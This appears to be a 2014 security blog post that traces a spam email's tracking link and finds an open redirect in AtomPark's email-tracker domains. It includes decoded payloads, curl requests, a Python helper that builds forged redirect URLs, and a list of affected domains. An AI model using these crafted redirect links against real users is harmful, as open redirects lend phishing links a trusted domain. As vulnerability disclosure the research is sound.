AverageSecurityGuy

Security, Programming, Pentesting


23 September 2014

Analysis of a Spam Link

by averagesecurityguy

This weekend I received a spam message that wanted to sell me tickets to a comedy show in Louisville, KY. This spam message caught my eye because it made it past Google's spam filters and I'm planning to go to Derbycon in Louisville next week. I decided to explore the link in the email a bit and see what I could find.

The original link in the email was this:

http://www.emergingcomics.com/special.php?j=eyJ1IjoiRDk1QUI0RUQzODAzRjVBOTU3NDJDQzE5NEUzQzEzOTIiLCJpIjoiQU1BWk9OJTIwU0VTIiwiciI6ImciLCJ0IjoiYUp0Zml0aEhRUHRzUXV0YXRFeHNvSkZ1eEZEb2h5ZyIsImwiOiJodHRwJTNBJTJGJTJGJTIwZ29vLmdsJTJGQTdYT0pIIiwidiI6IjguNjkuMC4xNjEifQ==&r=0.720967122353613

The first thing I noticed was the base64-encoded data in the "j" parameter. Decoding it gave the following JSON object:

{"u":"D95AB4ED3803F5A95742CC194E3C1392","i":"AMAZON%20SES","r":"g","t":"aJtfithHQPtsQutatExsoJFuxFDohyg","l":"http%3A%2F%2F%20goo.gl%2FA7XOJH","v":"8.69.0.161"}

Looking at the "l" key in the JSON object, I decided the special.php page was probably a redirect script, so I requested the link with curl -I to see only the response headers:

HTTP/1.1 302 Moved Temporarily
Date: Mon, 22 Sep 2014 17:37:27 GMT
Server: Apache mod_fcgid/2.3.10-dev
X-Powered-By: PHP/5.4.31
Location: http://atmst.net/utr64.php?j=eyJ1IjoiRDk1QUI0RUQzODAzRjVBOTU3NDJDQzE5NEUzQzEzOTIiLCJpIjoiQU1BWk9OJTIwU0VTIiwiciI6ImciLCJ0IjoiYUp0Zml0aEhRUHRzUXV0YXRFeHNvSkZ1eEZEb2h5ZyIsImwiOiJodHRwJTNBJTJGJTJGJTIwZ29vLmdsJTJGQTdYT0pIIiwidiI6IjguNjkuMC4xNjEifQ%3D%3D
Content-Type: text/html

Sure enough, special.php answered with a 302 and sent me to atmst.net/utr64.php. The same base64 data was passed along in the "j" parameter, this time URL-encoded: the trailing "==" padding has become "%3D%3D".

I again used curl -I to fetch the page at atmst.net, assuming it was a redirect script as well:

HTTP/1.1 302 Found
Server: nginx/1.0.4
Date: Mon, 22 Sep 2014 17:39:29 GMT
Content-Type: text/html
Connection: keep-alive
Keep-Alive: timeout=20
X-Powered-By: PHP/5.2.17
Location: http:// goo.gl/A7XOJH
Cache-Control: max-age=259200
Expires: Thu, 25 Sep 2014 17:39:29 GMT

Once again I was redirected, this time to the URL referenced in the "l" key of the base64-encoded JSON object. Note that the script URL-decoded the "l" value before using it: the "%20" in the key became the space in the Location header, so the decoded value is evidently passed straight through as the redirect target.

After doing a bit of research on atmst.net I found that it is used by AtomPark Software as part of its Atomic Email Tracker software. I'm not sure what all of the keys in the JSON object represent, but based on the information at hxxp://www.massmailsoftware.com/tracker/integration.htm the "u" key is most likely the MD5 hash of the email address of the user account (it is 32 hex characters, the length of an MD5 digest).

I decided to play around with the parameters a bit and see if all of the parameters were required for the redirect to be successful.

With the exception of the "l" key, I replaced all of the values in the JSON object with the letter "a". For the "l" key I changed the URL to http%3A%2F%2F%20arbitrary.test, so that my JSON object now looked like this:

{"u":"a","i":"a","r":"g","t":"a","l":"http%3A%2F%2F%20arbitrary.test","v":"a"}

I then base64-encoded the JSON object and once again used curl -I to see what would happen:

curl -I 'http://atmst.net/utr64.php?j=eyJ1IjoiYSIsImkiOiJhIiwiciI6ImciLCJ0IjoiYSIsImwiOiJodHRwJTNBJTJGJTJGJTIwYXJiaXRyYXJ5LnRlc3QiLCJ2IjoiYSJ9'

HTTP/1.1 302 Found
Server: nginx/1.0.4
Date: Mon, 22 Sep 2014 17:45:49 GMT
Content-Type: text/html
Connection: keep-alive
Keep-Alive: timeout=20
X-Powered-By: PHP/5.2.17
Location: http:// arbitrary.test
Cache-Control: max-age=259200
Expires: Thu, 25 Sep 2014 17:45:49 GMT

This time I was redirected to the URL I chose without providing a valid user id, token, or any other identifying value. That makes atmst.net/utr64.php an open redirect: anyone can craft a link on that domain that lands wherever they like. Further testing showed that only the "r" and "l" keys were required in the JSON object and that the target URL did not need to be URL-encoded.

So if we base64-encode the following JSON object and pass it as the "j" parameter to atmst.net/utr64.php, we are redirected to google.com:

{"r":"g","l":"http://google.com"}
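The decoding of the "j" parameter above and the construction of the minimal redirect payload, as an added Python example that is not code from this post or from AtomPark's tracker. The spam URL is the one quoted in the post; everything else is an assumption for the example. The last two functions show one way a redirect script could have refused the forged payload: binding the JSON to a server-side HMAC, a hypothetical replacement for whatever the "t" key really is (the secret is made up here).

```python
import base64
import hashlib
import hmac
import json
from urllib.parse import quote, unquote, urlparse

# The spam link quoted in the post (page data, not constructed for the example).
SPAM_URL = (
    "http://www.emergingcomics.com/special.php?j="
    "eyJ1IjoiRDk1QUI0RUQzODAzRjVBOTU3NDJDQzE5NEUzQzEzOTIiLCJpIjoiQU1BWk9OJTIwU0VT"
    "IiwiciI6ImciLCJ0IjoiYUp0Zml0aEhRUHRzUXV0YXRFeHNvSkZ1eEZEb2h5ZyIsImwiOiJodHRw"
    "JTNBJTJGJTJGJTIwZ29vLmdsJTJGQTdYT0pIIiwidiI6IjguNjkuMC4xNjEifQ=="
    "&r=0.720967122353613"
)


def query_param(url, name):
    """Return the first value of a query parameter, URL-decoded.

    Deliberately uses unquote() rather than parse_qs(): parse_qs turns '+'
    into a space, which silently corrupts base64 carried in a query string.
    """
    for pair in urlparse(url).query.split("&"):
        key, _, value = pair.partition("=")
        if key == name:
            return unquote(value)
    raise KeyError(name)


def decode_tracker_payload(url):
    """Decode the base64 JSON object in the 'j' parameter.

    Works for both the raw '==' padding in the email link and the '%3D%3D'
    form in the Location header; padding is restored in case a relay stripped it.
    """
    j = query_param(url, "j")
    j += "=" * (-len(j) % 4)
    return json.loads(base64.b64decode(j, validate=True))


def redirect_target(payload):
    """The 'l' value is URL-encoded a second time inside the JSON. Decoding it
    reproduces the Location header the tracker returned, stray space included."""
    return unquote(payload["l"])


def build_redirect_url(target, base="http://atmst.net/utr64.php"):
    """Build the minimal payload the post found sufficient: only 'r' and 'l'."""
    payload = json.dumps({"r": "g", "l": target}, separators=(",", ":"))
    j = base64.b64encode(payload.encode()).decode()
    return f"{base}?j={quote(j, safe='')}"  # keep '+', '/' and '=' intact


# Hypothetical hardening (an assumption, not AtomPark's design): the server
# signs every payload it hands out, so a forged 'l' no longer verifies.
SERVER_SECRET = b"constructed-secret-for-this-example"


def sign_payload(fields, secret=SERVER_SECRET):
    """Return the payload with a 't' field holding an HMAC over the other fields."""
    unsigned = {k: v for k, v in fields.items() if k != "t"}
    msg = json.dumps(unsigned, sort_keys=True, separators=(",", ":")).encode()
    tag = hmac.new(secret, msg, hashlib.sha256).hexdigest()
    return {**unsigned, "t": tag}


def verified_target(payload, secret=SERVER_SECRET):
    """Return the redirect target only if the HMAC in 't' matches; None otherwise."""
    expected = sign_payload(payload, secret)["t"]
    if not hmac.compare_digest(expected, str(payload.get("t", ""))):
        return None
    return unquote(payload["l"])


if __name__ == "__main__":
    decoded = decode_tracker_payload(SPAM_URL)
    print(decoded)
    print("redirects to:", redirect_target(decoded))
    print("forged link:", build_redirect_url("http://google.com"))
    signed = sign_payload({"u": "a", "r": "g", "l": "http://google.com"})
    print("signed ok:", verified_target(signed))
    print("forged ok:", verified_target(dict(signed, l="http://arbitrary.test")))
```

With the signed variant, swapping "l" for another URL or dropping the "t" key makes verification fail, which is exactly the check the "all a's" experiment above showed to be missing.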

Further research found other domains run by the same company that are vulnerable to the same open redirect:

atrstat.com
etrstat.com
atmst[1-5].net
